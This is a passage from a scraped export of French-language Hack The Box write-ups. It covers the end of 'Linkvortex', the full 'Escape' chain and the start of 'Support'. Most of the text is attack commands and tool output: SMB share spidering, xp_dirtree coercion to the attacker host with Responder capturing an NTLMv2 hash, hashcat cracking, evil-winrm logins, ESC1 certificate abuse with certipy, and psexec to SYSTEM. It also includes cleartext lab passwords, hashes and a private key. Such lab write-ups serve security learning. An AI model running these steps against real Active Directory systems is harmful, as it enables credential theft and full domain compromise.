b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAmpHVhV11MW7eGt9WeJ23rVuqlWnMpF+FclWYwp4SACcAilZdOF8T ... xmo6eXMvU90HVbakUoRspYWISr51uVEvIDuNcZUJlseINXimZkrkD40QTMrYJc9slj9wkA ICLgLxRR4sAx0AAAAPcm9vdEBsaW5rdm9ydGV4AQIDBA== -----END OPENSSH PRIVATE KEY----- # ------------------------------- $ vim root.key $ chmod 600 root.key $ ssh -i root.key root@10.10.11.47 Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64) ... Last login: Mon Dec 2 11:20:43 2024 from 10.10.14.61 -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) root@linkvortex:~# whoami root root@linkvortex:~# cat root.txt 5f3e.....ebc9 ","date":"2025-10-22T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/linkvortex-htb/","title":"HTB | Linkvortex"},{"content":" Machine name OS IP Difficulty Escape Windows 10.10.11.202 Medium Users 1 2 3 4 # SQL Server PublicUser : GuestUserCantWrite1 sql_svc : REGGIE1234ronnie Ryan.cooper : NuclearMosquito3 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.202 PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 22:21:01Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Issuer: commonName=sequel-DC-CA/domainComponent=sequel | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-01-18T23:03:57 | Not valid after: 2074-01-05T23:03:57 | MD5: ee4cc647ebb2c23ef4721d7028809d82 | SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 | -----BEGIN CERTIFICATE----- | MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF | I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== |_-----END CERTIFICATE----- |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time. 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Issuer: commonName=sequel-DC-CA/domainComponent=sequel | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-01-18T23:03:57 | Not valid after: 2074-01-05T23:03:57 | MD5: ee4cc647ebb2c23ef4721d7028809d82 | SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 | -----BEGIN CERTIFICATE----- | MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF | I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== |_-----END CERTIFICATE----- |_ssl-date: 2025-09-10T22:22:34+00:00; +7h59m59s from scanner time. 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM |_ms-sql-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2025-09-10T22:17:26 | Not valid after: 2055-09-10T22:17:26 | MD5: 8f5d163bc1ef9dbb2b789cdf2d7b5a90 | SHA-1: 6c89bf0840566f823a006405fce65a4f0570de19 | -----BEGIN CERTIFICATE----- | MIIDADCCAeigAwIBAgIQfAGJqsgHZopA2ARCvdHiZTANBgkqhkiG9w0BAQsFADA7 | JfvGOQ== |_-----END CERTIFICATE----- |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time. 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Issuer: commonName=sequel-DC-CA/domainComponent=sequel | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-01-18T23:03:57 | Not valid after: 2074-01-05T23:03:57 | MD5: ee4cc647ebb2c23ef4721d7028809d82 | SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 | -----BEGIN CERTIFICATE----- | I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== |_-----END CERTIFICATE----- 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Issuer: commonName=sequel-DC-CA/domainComponent=sequel | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-01-18T23:03:57 | Not valid after: 2074-01-05T23:03:57 | MD5: ee4cc647ebb2c23ef4721d7028809d82 | SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 | -----BEGIN CERTIFICATE----- | MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF | I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== |_-----END CERTIFICATE----- |_ssl-date: 2025-09-10T22:22:34+00:00; +7h59m59s from scanner time. 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49687/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49706/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49709/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Host script results: |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s | smb2-time: | date: 2025-09-10T22:21:54 |_ start_date: N/A | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 63970/tcp): CLEAN (Timeout) | Check 2 (port 24393/tcp): CLEAN (Timeout) | Check 3 (port 50586/udp): CLEAN (Timeout) | Check 4 (port 24268/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 311: |_ Message signing enabled and required Foothold SMB Share ENumeration - guest A l\u0026rsquo;aide de l\u0026rsquo;utilisateur guest et sans mot de passe, on réussi à lister les SMB SHARES. Le share Public est accessible en lecture.\n1 2 3 4 5 6 7 8 9 10 11 12 $ nxc smb 10.10.11.202 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --shares SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\\guest: SMB 10.10.11.202 445 DC [*] Enumerated shares SMB 10.10.11.202 445 DC Share Permissions Remark SMB 10.10.11.202 445 DC ----- ----------- ------ SMB 10.10.11.202 445 DC ADMIN$ Remote Admin SMB 10.10.11.202 445 DC C$ Default share SMB 10.10.11.202 445 DC IPC$ READ Remote IPC SMB 10.10.11.202 445 DC NETLOGON Logon server share SMB 10.10.11.202 445 DC Public READ SMB 10.10.11.202 445 DC SYSVOL Logon server share Public Share - \u0026ldquo;SQL Server Procedures.pdf\u0026rdquo; On trouve un fichier \u0026ldquo;SQL Server Procedures.pdf\u0026rdquo; dans le share Public à l\u0026rsquo;aide de l\u0026rsquo;utilisateur guest. J\u0026rsquo;utilise ici uniquement nxc pour extraire le fichier.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 $ nxc smb 10.10.11.202 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; -M spider_plus SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\\guest: SPIDER_PLUS 10.10.11.202 445 DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.202 445 DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.202 445 DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.202 445 DC [*] EXCLUDE_FILTER: [\u0026#39;print$\u0026#39;, \u0026#39;ipc$\u0026#39;] SPIDER_PLUS 10.10.11.202 445 DC [*] EXCLUDE_EXTS: [\u0026#39;ico\u0026#39;, \u0026#39;lnk\u0026#39;] SPIDER_PLUS 10.10.11.202 445 DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.202 445 DC [*] OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus SMB 10.10.11.202 445 DC [*] Enumerated shares SMB 10.10.11.202 445 DC Share Permissions Remark SMB 10.10.11.202 445 DC ----- ----------- ------ SMB 10.10.11.202 445 DC ADMIN$ Remote Admin SMB 10.10.11.202 445 DC C$ Default share SMB 10.10.11.202 445 DC IPC$ READ Remote IPC SMB 10.10.11.202 445 DC NETLOGON Logon server share SMB 10.10.11.202 445 DC Public READ SMB 10.10.11.202 445 DC SYSVOL Logon server share SPIDER_PLUS 10.10.11.202 445 DC [+] Saved share-file metadata to \u0026#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.202.json\u0026#34;. SPIDER_PLUS 10.10.11.202 445 DC [*] SMB Shares: 6 (ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL) SPIDER_PLUS 10.10.11.202 445 DC [*] SMB Readable Shares: 2 (IPC$, Public) SPIDER_PLUS 10.10.11.202 445 DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.202 445 DC [*] Total folders found: 0 SPIDER_PLUS 10.10.11.202 445 DC [*] Total files found: 1 SPIDER_PLUS 10.10.11.202 445 DC [*] File size average: 48.39 KB SPIDER_PLUS 10.10.11.202 445 DC [*] File size min: 48.39 KB SPIDER_PLUS 10.10.11.202 445 DC [*] File size max: 48.39 KB $ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.202.json { \u0026#34;Public\u0026#34;: { \u0026#34;SQL Server Procedures.pdf\u0026#34;: { \u0026#34;atime_epoch\u0026#34;: \u0026#34;2022-11-19 12:50:54\u0026#34;, \u0026#34;ctime_epoch\u0026#34;: \u0026#34;2022-11-17 20:47:32\u0026#34;, \u0026#34;mtime_epoch\u0026#34;: \u0026#34;2022-11-19 12:51:25\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;48.39 KB\u0026#34; } } } $ nxc smb 10.10.11.202 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --get-file \u0026#34;\\\\SQL Server Procedures.pdf\u0026#34; \u0026#34;SQL Server Procedures.pdf\u0026#34; --share Public SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\\guest: SMB 10.10.11.202 445 DC [*] Copying \u0026#34;\\SQL Server Procedures.pdf\u0026#34; to \u0026#34;SQL Server Procedures.pdf\u0026#34; SMB 10.10.11.202 445 DC [+] File \u0026#34;\\SQL Server Procedures.pdf\u0026#34; was downloaded to \u0026#34;SQL Server Procedures.pdf\u0026#34; Credentials for MSSQL Le document \u0026ldquo;SQL Server Procedures.pdf\u0026rdquo; est une procedure pour se connecter à une instance de SQL Server.\nCe document fait mention de plusieurs utilisateurs : Ryan, Tom, brandon.brown.\nOn récupère même des credentials pour se connecter au serveur SQL :\nPublicUser : GuestUserCantWrite1 1 2 3 4 Bonus For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1 . Refer to the previous guidelines and make sure to switch the \u0026#34;Windows Authentication\u0026#34; to \u0026#34;SQL Server Authentication\u0026#34;. MSSQL : xp_dirtree and responder En utilisant mssqlclient, on se connecte au sql server avec l\u0026rsquo;utilisateur récupéré.\nOn peut alors effectuer une requête avec la commande xp_dirtree afin d\u0026rsquo;effectuer une fausse requête pour énumerer un share sur notre ordinateur (IP de l\u0026rsquo;attaquant).\nDans le même temps on lance un responder qui se met en attente. L\u0026rsquo;idée est la commande est executé de manière authentifier avec l\u0026rsquo;utilisateur sql_svc, et le responder peut intercepter ses credentials.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 mssqlclient.py \u0026#34;DC\u0026#34;/\u0026#34;PublicUser\u0026#34;:\u0026#34;GuestUserCantWrite1\u0026#34;@\u0026#34;10.10.11.202\u0026#34; Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\\SQLMOCK): Line 1: Changed database context to \u0026#39;master\u0026#39;. [*] INFO(DC\\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (PublicUser guest@master)\u0026gt; xp_dirtree \\\\10.10.14.10\\fake\\file subdirectory depth file ------------ ----- ---- Ici, on observe la reception du hachage du mot de passe de l\u0026rsquo;utilisateur sql_svc.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ responder -I tun0 -w -F __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR \u0026amp; MDNS Responder 3.1.5.0 ... [+] Listening for events... [!] Error starting TCP server on port 53, check permissions or other servers running. [SMB] NTLMv2-SSP Client : 10.10.11.202 [SMB] NTLMv2-SSP Username : sequel\\sql_svc [SMB] NTLMv2-SSP Hash : sql_svc::sequel:1122334455667788:0ED55C287EF37F6AD239ED0D6FE449A0:010100000000000000B9CE454A23DC018C349009419598CF000000000200080044004C005200500001001E00570049004E002D005A004A00320059004300360033004D0035003400480004003400570049004E002D005A004A00320059004300360033004D003500340048002E0044004C00520050002E004C004F00430041004C000300140044004C00520050002E004C004F00430041004C000500140044004C00520050002E004C004F00430041004C000700080000B9CE454A23DC0106000400020000000800300030000000000000000000000000300000051C4546D071DE4532ED8EA78B4BE4B4FB7296E7379A3F3F9319A487E526B2A10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310030000000000000000000 Hashcat : sql_svc password On trouve le mot de passe de sql_svc à l\u0026rsquo;aide de hashcat et la liste rockyou.txt.\n1 2 $ hashcat -m 5600 ./hash.txt ~/wordlists/rockyou.txt --show SQL_SVC::sequel:112233.....0000000:REGGIE1234ronnie ERRORLOG.BAK : Ryan.Cooper password On peut alors se connecter au compte sql_svc avec evilwinrm et obtenir un powershell sur la machine :\n1 2 $ evil-winrm -u \u0026#39;sql_svc\u0026#39; -p \u0026#39;REGGIE1234ronnie\u0026#39; -i \u0026#34;10.10.11.202\u0026#34; ... On trouve le mot de passe de Ryan.cooper dans un fichier de logs de SQL Server : NuclearMosquito3\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 *Evil-WinRM* PS C:\\SQLServer\\Logs\u0026gt; ls Directory: C:\\SQLServer\\Logs Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK *Evil-WinRM* PS C:\\SQLServer\\Logs\u0026gt; download \u0026#34;C:/SQLServer/Logs/ERRORLOG.BAK\u0026#34; Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command Info: Downloading C:/SQLServer/Logs/ERRORLOG.BAK to ERRORLOG.BAK ---------------------------------- $ cat ERRORLOG.BAK | grep -i pass 2022-11-18 13:43:06.75 spid18s Password policy update was successful. 2022-11-18 13:43:07.44 Logon Logon failed for user \u0026#39;sequel.htb\\Ryan.Cooper\u0026#39;. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Logon failed for user \u0026#39;NuclearMosquito3\u0026#39;. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] $ evil-winrm -u \u0026#39;Ryan.Cooper\u0026#39; -p \u0026#39;NuclearMosquito3\u0026#39; -i \u0026#34;10.10.11.202\u0026#34; Evil-WinRM shell v3.7 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\Ryan.Cooper\\Documents\u0026gt; type \u0026#34;C:/Users/Ryan.Cooper/Desktop/user.txt\u0026#34; d3b6.....cd0e Privilege Escalation : ESC1 Template When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.\nEnumeration : certipy find 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 $ certipy find -u \u0026#39;Ryan.cooper\u0026#39; -p \u0026#39;NuclearMosquito3\u0026#39; -dc-ip 10.10.11.202 -vulnerable -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for \u0026#39;sequel-DC-CA\u0026#39; via CSRA [!] Got error while trying to get CA configuration for \u0026#39;sequel-DC-CA\u0026#39; via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for \u0026#39;sequel-DC-CA\u0026#39; via RRP [*] Got CA configuration for \u0026#39;sequel-DC-CA\u0026#39; [*] Enumeration output: Certificate Authorities 0 CA Name : sequel-DC-CA DNS Name : dc.sequel.htb Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101 Certificate Validity Start : 2022-11-18 20:58:46+00:00 Certificate Validity End : 2121-11-18 21:08:46+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : SEQUEL.HTB\\Administrators Access Rights ManageCertificates : SEQUEL.HTB\\Administrators SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Enterprise Admins ManageCa : SEQUEL.HTB\\Administrators SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Enterprise Admins Enroll : SEQUEL.HTB\\Authenticated Users Certificate Templates 0 Template Name : UserAuthentication Display Name : UserAuthentication Certificate Authorities : sequel-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : PublishToDs IncludeSymmetricAlgorithms Private Key Flag : ExportableKey Extended Key Usage : Client Authentication Secure Email Encrypting File System Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 10 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Domain Users SEQUEL.HTB\\Enterprise Admins Object Control Permissions Owner : SEQUEL.HTB\\Administrator Write Owner Principals : SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Enterprise Admins SEQUEL.HTB\\Administrator Write Dacl Principals : SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Enterprise Admins SEQUEL.HTB\\Administrator Write Property Principals : SEQUEL.HTB\\Domain Admins SEQUEL.HTB\\Enterprise Admins SEQUEL.HTB\\Administrator [!] Vulnerabilities ESC1 : \u0026#39;SEQUEL.HTB\\\\Domain Users\u0026#39; can enroll, enrollee supplies subject and template allows client authentication Requesting a Malicious Certificate On demande un certificat pour Administrator à travers le template vulnérable :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ certipy req -username \u0026#34;Ryan.cooper@sequel.htb\u0026#34; -p \u0026#34;NuclearMosquito3\u0026#34; -target \u0026#39;dc.sequel.htb\u0026#39; -ca \u0026#34;sequel-DC-CA\u0026#34; -template \u0026#34;UserAuthentication\u0026#34; -upn \u0026#34;Administrator@sequel.htb\u0026#34; -debug Certipy v4.8.2 - by Oliver Lyak (ly4k) [+] Trying to resolve \u0026#39;dc.sequel.htb\u0026#39; at \u0026#39;127.0.0.53\u0026#39; [+] Trying to resolve \u0026#39;SEQUEL.HTB\u0026#39; at \u0026#39;127.0.0.53\u0026#39; [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.11.202[\\pipe\\cert] [+] Connected to endpoint: ncacn_np:10.10.11.202[\\pipe\\cert] [*] Successfully requested certificate [*] Request ID is 17 [*] Got certificate with UPN \u0026#39;Administrator@sequel.htb\u0026#39; [*] Certificate has no object SID [*] Saved certificate and private key to \u0026#39;administrator.pfx\u0026#39; ### Fixing Kerberos Clock Skew (KRB_AP_ERR_SKEW) L’attaque échoue d’abord à cause d’un décalage horaire (KRB_AP_ERR_SKEW).\nEn ajustant l’heure avec faketime et l’heure réelle du DC, le problème est corrigé.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ date Fri Sep 12 12:03:10 AM CEST 2025 $ ntpdate -q 10.10.11.202 2025-09-12 08:20:53.85924 (+0200) +28800.935013 +/- 0.010303 10.10.11.202 s1 no-leap $ certipy auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) $ faketime \u0026#34;$(date +\u0026#39;%Y-%m-%d\u0026#39;) $(net time -S 10.10.11.202 | awk \u0026#39;{print $4}\u0026#39;)\u0026#34; zsh $ date Fri Sep 12 08:03:39 AM CEST 2025 $ ntpdate -q 10.10.11.202 2025-09-12 08:03:44.141842 (+0200) -0.075273 +/- 0.010154 10.10.11.202 s1 no-leap Getting a TGT as Administrator Avec le certificat généré, on obtient un TGT et le hash NT de l’Administrator :\n1 2 3 4 5 6 7 8 9 $ certipy auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@sequel.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee Gaining Administrator Shell (psexec) En utilisant le TGT et l\u0026rsquo;outil psexec.py, on obtient un shell en tant que nt authority\\system :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ export KRB5CCNAME=\u0026#34;administrator.ccache\u0026#34; $ psexec.py -k -no-pass sequel.htb/Administrator@dc.sequel.htb Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on dc.sequel.htb..... [*] Found writable share ADMIN$ [*] Uploading file zjPAtFqg.exe [*] Opening SVCManager on dc.sequel.htb..... [*] Creating service cbfM on dc.sequel.htb..... [*] Starting service cbfM..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2746] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt 1991.....91d7 ","date":"2025-09-10T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/escape-htb/","title":"HTB | Escape"},{"content":" Machine name OS IP Difficulty Support Windows 10.10.11.174 Easy Users 1 2 ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz support : Ironside47pleasure40Watchful System Info 1 Windows Server 2022 Build 20348 x64 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.174 PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-07 16:43:36Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Foothold Dumping Users using guest account 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nxc smb 10.10.11.174 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB 10.10.11.174 445 DC [+] support.htb\\guest: $ nxc smb 10.10.11.174 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --rid-brute | cut -d\u0026#39;:\u0026#39; -f2 | cut -d\u0026#39;\\\u0026#39; -f2 | grep TypeUser | cut -d\u0026#39; \u0026#39; -f1 \u0026gt; users.txt Administrator Guest krbtgt DC$ ldap support smith.rosario hernandez.stanley ... SMB Share : support-tools Grâce au compte guest, on obtient un accès sur le share smb support-tools, qui nous permet notamment de récupérer un fichier intéressant : UserInfo.exe.zip\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 $ nxc smb 10.10.11.174 -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; -M spider_plus SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB 10.10.11.174 445 DC [+] support.htb\\guest: SPIDER_PLUS 10.10.11.174 445 DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.174 445 DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.174 445 DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.174 445 DC [*] EXCLUDE_FILTER: [\u0026#39;print$\u0026#39;, \u0026#39;ipc$\u0026#39;] SPIDER_PLUS 10.10.11.174 445 DC [*] EXCLUDE_EXTS: [\u0026#39;ico\u0026#39;, \u0026#39;lnk\u0026#39;] SPIDER_PLUS 10.10.11.174 445 DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.174 445 DC [*] OUTPUT_FOLDER: 